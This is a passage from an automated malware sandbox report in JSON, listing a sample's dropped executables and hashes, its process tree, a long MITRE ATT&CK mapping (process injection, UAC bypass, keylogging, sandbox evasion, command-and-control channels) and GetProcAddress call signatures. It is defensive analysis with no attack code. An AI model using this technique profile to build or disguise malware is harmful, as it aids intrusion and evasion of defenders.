Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_.exe", "file_size": 90494, "sha256": "d4bb4122c87ca1b76d30a6b64feb18e326c5c4d1f3c2af3c96404bb04488feaa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RUNDLL32.EXE.67A47D15.bin", "file_size": 93247, "sha256": "a0aff03ea6a3e70faaface8ae97d8105ae41a936f07798971d9d548c3a307a61", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)", "17 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)"], "imported_objects": ["5 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)", "11 .C Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)", "2 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)", "12 .OBJ Files (COFF) linked with LINK.EXE 5.12 (Visual Studio 5 SP2) (build: 8034)", "4 .OBJ Files linked with ALIASOBJ.EXE 6.00 (Internal OLDNAMES.LIB Tool) (build: 7291)"], "file_analysis": ["File contains C++ code", "File is the product of a medium codebase (17 files)"], "total_file_compositions_imports": 239}, "processes": [{"uid": "00000000-00005944", "name": "3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe", "normalized_path": "C:\\3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe", "sha256": "3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8"}, {"uid": "00000000-00004384", "parentuid": "00000000-00005944", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\system\\rundll32.exe", "sha256": "a0aff03ea6a3e70faaface8ae97d8105ae41a936f07798971d9d548c3a307a61"}, {"uid": "00000000-00004332", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 4384 -s 192", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Clear Persistence", "attck_id": "T1070.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Odbcconf", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "malicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005944)\n 